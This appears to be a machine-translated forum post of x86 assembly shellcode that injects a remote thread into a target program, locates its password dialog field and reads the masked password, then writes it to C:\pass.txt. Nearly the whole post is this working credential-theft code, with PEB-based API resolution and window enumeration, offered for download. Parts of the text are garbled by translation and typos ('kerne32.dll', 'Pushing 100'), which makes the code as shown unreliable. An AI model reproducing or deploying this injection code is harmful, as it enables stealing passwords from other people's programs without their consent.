[Code] without DLL Remote thread injection, get the asterisk password of the Target Program

The main body shellcode code is as follows:

; Module: rmtgetpass. ASM
; Get password by injecting remote thread
; 29-nov-2008 created by benyanwk

; Write This shellcode is a hard work
; So I search the book for a more resonable
; Method

; Two method:
; (1) Using DLL file to inject
; (2) using advance shellcode Technique
; Shocould make a revision

. 386
. Model flat, stdcall
Option Casemap: None

;/////////////////////////////////
; // Struct Definition
;////////////////////////////////
Image_export_directory struct
Characteristics DWORD?
Timedatestamp DWORD?
Majorversion word?
Minorversion word?
Nname DWORD?
Nbase DWORD?
Numberoffunctions DWORD?
Numberofnames DWORD?
Addressoffunctions DWORD?
Addressofnames DWORD?
Addressofnameordinals DWORD?
Image_export_directory ends

St_param struct
Apiaddress DWORD?
Pid dword?
Phwnd DWORD?
St_param ends
 

;////////////////////////////////////
; // Externs
;///////////////////////////////////

. Code

_ Rmtgetpass proc lparam: DWORD

; Get the password by remote thread
; Using shellcode Programming
 

;//////////////////////////////
; // Shellcode's code
;//////////////////////////////
 
; First get the relocation difference

Call rebase
Rebase:
Pop EBP;
Sub EBP, offset rebase;

; Get the kernel32.dll's base address
; By peb direct access
; Place in here not routine
; Because we need it after

Assume FS: nothing;

MoV eax, FS: [30 h]; PTR _ Teb
MoV eax, [eax + 0ch]; PTR _ peb_ldr_data
MoV eax, [eax + 1ch]; list_entry ininitializationordermodulelist. flink
MoV eax, [eax]; flink's flink
MoV eax, [eax + 08 h]; The Kernel32's base address
MoV [EBP + dwbase], eax;
MoV ECx, eax; the kernel base parameter
; Get the two key API's address

Lea EDI, [EBP + sgetprocaddress];
Lea eax, [EBP + getapiaddr];
Call eax;

Add eax, [EBP + dwbase];
MoV [EBP + pgetprocaddress], eax;

Lea EDI, [EBP + sloadlibrary];
Lea eax, [EBP + getapiaddr];
MoV ECx, [EBP + dwbase];
Call eax;

Add eax, [EBP + dwbase];
MoV [EBP + ploadlibrary], eax;

; Get other API's address
Lea eax, [EBP + swritefile];
Push eax;
Push [EBP + dwbase];
Call [EBP + pgetprocaddress];
MoV [EBP + pwritefile], eax;

Lea eax, [EBP + screatemailslot];
Push eax;
Push [EBP + dwbase];
Call [EBP + pgetprocaddress];
MoV [EBP + pcreatemailslot], eax

Lea eax, [EBP + screatefile];
Push eax;
Push [EBP + dwbase];
Call [EBP + pgetprocaddress];
MoV [EBP + pcreatefile], eax;

Lea eax, [EBP + sgetcurrentprocessid];
Push eax;
Push [EBP + dwbase];
Call [EBP + pgetprocaddress];
MoV [EBP + pgetcurrentprocessid], eax;

Lea eax, [EBP + sexitthread];
Push eax ;;
Push [EBP + dwbase];
Call [EBP + pgetprocaddress];
MoV [EBP + pexitthread], eax;

Lea eax, [EBP + ssleep];
Push eax;
Push [EBP + dwbase];
Call [EBP + pgetprocaddress];
MoV [EBP + psleep], eax;

Lea eax, [EBP + susrdll];
Push eax;

Call [EBP + ploadlibrary];
MoV [EBP + dwbase2], eax;
Lea eax, [EBP + sgetwindowthreadprocessid];
Push eax;
Push [EBP + dwbase2];
Call [EBP + pgetprocaddress];
MoV [EBP + pgetwindowthreadprocessid], eax

Lea eax, [EBP + sgetwindowtext];
Push eax;
Push [EBP + dwbase2];
Call [EBP + pgetprocaddress];
MoV [EBP + pgetwindowtext], eax;

Lea eax, [EBP + sgetdlgitem];
Push eax;
Push [EBP + dwbase2];
Call [EBP + pgetprocaddress];
MoV [EBP + pgetdlgitem], eax;

Lea eax, [EBP + senumwindows];
Push eax;
Push [EBP + dwbase2];
Call [EBP + pgetprocaddress];
MoV [EBP + penumwindows], eax;

; Get the process ID
Call [EBP + pgetcurrentprocessid];
MoV [EBP + dwpid], eax;

; Get the target's window p

MoV eax, [EBP + pgetwindowthreadprocessid];
Lea ESI, [EBP + stparam];
Assume ESI: PTR st_param;
MoV [esi]. apiaddress, eax;
MoV eax, [EBP + dwpid];
MoV [esi]. PID, eax;
Lea eax, [EBP + hwnd];
MoV [esi]. phwnd, eax;

Push ESI;
Lea eax, [EBP + enumproc]; enumwindowsproc
Push eax;
Call [EBP + penumwindows];

; We need the enumproc finished
; To make sure that we get the hwnd
; Wait for 1 sec

; Push 1000;
; Call [EBP + psleep];

; Get the dialog item
Push idc_pass;
Push [EBP + hwnd];
Call [EBP + pgetdlgitem];

; Get the window's password
Push 99;
Lea EBX, [EBP + pass];
Push EBX;
Push eax;
Call [EBP + pgetwindowtext];

Push 0;
Push 80 h; file_attribute_normal
Push 2; create_always
Push 0;
Push 00000003 h; file_0000_read | file_0000_write
Push 00000003 h; file_read_data | file_write_data; generic_read | generic_write
Lea eax, [EBP + sfile];
Push eax;
Call [EBP + pcreatefile];


Push 0;
Lea ECx, [EBP + hwnd]; The return bytes
Push ECx;
Pushing 100;
Lea ECx, [EBP + pass];
Push ECx;
Push eax;
Call [EBP + pwritefile];

MoV eax, 0;
Add ESP, 4;
DB 0c3h;

;///////////////////////////////
; // Data definition
;//////////////////////////////

;
; Data definition shocould be placed here
; After the code
; Because we need to code at the first
; So the exported symbol cocould be used
; As proc pointer correctly

Hwnd dd?
Dwpid dd?
Pass dB 100 DUP (?)
Idc_pass equ 1001
Dwbase dd?
Dwbase2 dd?
Pgetprocaddress dd?
Ploadlibrary dd?
Susrdll DB "user32.dll", 0
Skrldll DB "kerne32.dll", 0
Sgetprocaddress DB "getprocaddress", 0
Sloadlibrary DB "loadlibrarya", 0
Senumwindows DB "enumwindows", 0
Sgetwindowtext DB "getwindowtexta", 0
Sgetwindowthreadprocessid DB "getwindowthreadprocessid", 0
Sgetdlgitem DB "getdlgitem", 0
Screatefile DB "createfilea", 0
Swritefile DB "writefile", 0
Screatemailslot DB "createmailslota", 0
Sexitthread DB "exitthread", 0
Sgetcurrentprocessid DB "getcurrentprocessid", 0
Ssleep DB "Sleep", 0

Pcreatefile dd?
Pgetcurrentprocessid dd?
Pcreatemailslot dd?
Pexitthread dd?
Pgetwindowthreadprocessid dd?
Pgetwindowtext dd?
Pgetdlgitem dd?
Penumwindows dd?
Pwritefile dd?
Psleep dd?

Sfile DB "C: // pass.txt", 0

Stparam st_param <>

RET
_ Rmtgetpass endp

Getapiaddr:
; Get kernel32.dll's API address
; Pass argument using EDI
; EDI point to the API name
; ECx pass the kernel base address

; JMP to export directory table
MoV eax, ECx; get the kernel address
Add eax, [eax + 3ch]; JMP to the PE Signature
MoV eax, [eax + 78 H]; [RVA] The export directory table address
Add eax, ECx; [VA] translate to VA

MoV ESI, eax
Push ESI; the export table-4
Assume ESI: PTR image_export_directory

; JMP to name pointers array

MoV eax, [esi]. addressofnames; [RVA] The name pointers address
Add eax, [EBP + dwbase]; [VA] translate to VA
MoV EBX, eax; The name pointers base address
Push eax;

; Get the API names lengths
XOR ECx, ECx; clear the counter

Push ESI;-8
MoV ESI, EDI;
Get_len:
INC ECx;
MoV Al, byte PTR [esi];
Inc esi;
Test Al, Al;
Jnz get_len;
 
Pop ESI; restore the ESI;-4
 
; Search and match for the desired API

Push EDI; protect the desried API name-8
Push ECx; the API Name Length include null-C
Find_name:
Pop ECx; get the same API name pointer
Pop EDI; API Name Length
MoV ESI, [EBX]; [RVA] The name address
Add ESI, [EBP + dwbase]; [VA] translate to VA
Push EDI; protect the desried API name
Push ECx; protect the API name length;
@@:
Cmpsb;
Loopz @ B;
Test ECx, ECx
JZ find_addr;
 
 
Add EBX, 4; else, loop till match the name
JMP find_name;

Find_addr:
Pop EDI; balance the stack-8
Pop EDI; balance the stack-4

Pop eax;
Add EBX, 4; Increment
Sub EBX, eax; get the name pointer diff

; JMP to the name ordinal table
Pop ESI; get the export directory table-0
MoV eax, [esi]. addressofnameordinals; [RVA] Name ordinals address
Add eax, [EBP + dwbase]; [VA] translate to base address


; Get the name ordinal
Shr ebx, 1; Div by 2
Add eax, EBX;
MoV ax, word PTR [eax]; length word
And eax, 0000 ffffh; clear the high word

; Get the true ordianl
Sub eax, [esi]. nbase;

; Get the address
SHL eax, 2; Mul by 4
MoV EBX, [esi]. addressoffunctions; [RVA] function addresses address
Add EBX, [EBP + dwbase]; [VA] translate to VA

Add EBX, eax;
MoV eax, [EBX];

RET

 

Enumproc:
; In SS segment you can also use DS segment data
; But the relocation will dead.
; So we need to pass
; (1) the API address
; (2) the target's PID as parameter to
; Function as a struct pointer
 
; Notice: This is a stdcall call Convention Function

Push EBX; protect it;
Sub ESP, 4;
Push ESP; Local dwpid
Push [esp + 10 h]; currnet hwnd

MoV EBX, [esp + 18 h]; The st pointer
MoV eax, DS: [EBX]; ST. getwindowthreadprocessid
Call eax;
 
MoV eax, [esp];
CMP eax, DS: [EBX + 4]; compare the PID
Jnz N;

MoV eax, [esp + 0ch]; current hwnd
MoV ECx, [EBX + 8]; ST. phwnd
MoV DS: [ECx], eax; ST. hwnd = Current hwnd
 
MoV eax, 0;
Add ESP, 4; balance the stack
Pop EBX;
Retn 8;
N:
Add ESP, 4;
Pop EBX;
MoV eax, 1;
Retn 8;
End

 

Specific project files, please move to: http://bbs.pediy.com/showthread.php? T = 78032 download.